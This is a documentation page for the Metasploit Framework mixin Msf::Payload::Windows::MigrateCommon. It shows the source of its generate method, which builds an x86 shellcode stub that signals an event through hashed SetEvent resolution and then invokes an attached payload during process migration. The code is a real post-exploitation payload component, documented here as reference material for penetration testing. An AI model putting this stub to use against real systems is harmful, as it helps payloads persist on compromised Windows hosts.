Module: Msf::Payload::Windows::MigrateCommon

Includes:
Msf::Payload::Windows, BlockApi
Included in:
MigrateHttp, MigrateNamedPipe, MigrateTcp
Defined in:
lib/msf/core/payload/windows/migrate_common.rb

Overview

Not really a payload, but more a mixin that lets common functionality live in spot that makes sense, so that code duplication is reduced.

Instance Method Summary collapse

Methods included from BlockApi

#asm_block_api

Methods included from Msf::Payload::Windows

#apply_prepends, exit_types, #handle_intermediate_stage, #include_send_uuid, #initialize, #replace_var

Methods included from PrependMigrate

#apply_prepend_migrate, #initialize, #prepend_migrate, #prepend_migrate?, #prepend_migrate_64

Instance Method Details

#generate(opts = {}) ⇒ Object

Constructs the migrate stub on the fly



20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# File 'lib/msf/core/payload/windows/migrate_common.rb', line 20

def generate(opts={})
  asm = %Q^
  migrate:
    cld
    pop esi
    pop esi             ; esi now contains the pointer to the migrate context
    sub esp, 0x2000
    call start
    #{asm_block_api}
  start:
    pop ebp
  #{generate_migrate(opts)}
  signal_event:
    push dword [esi]    ; Event handle is pointed at by esi
    push #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')}
    call ebp            ; SetEvent(handle)
  call_payload:
    call dword [esi+8]  ; Invoke the associated payload
  ^

  Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string
end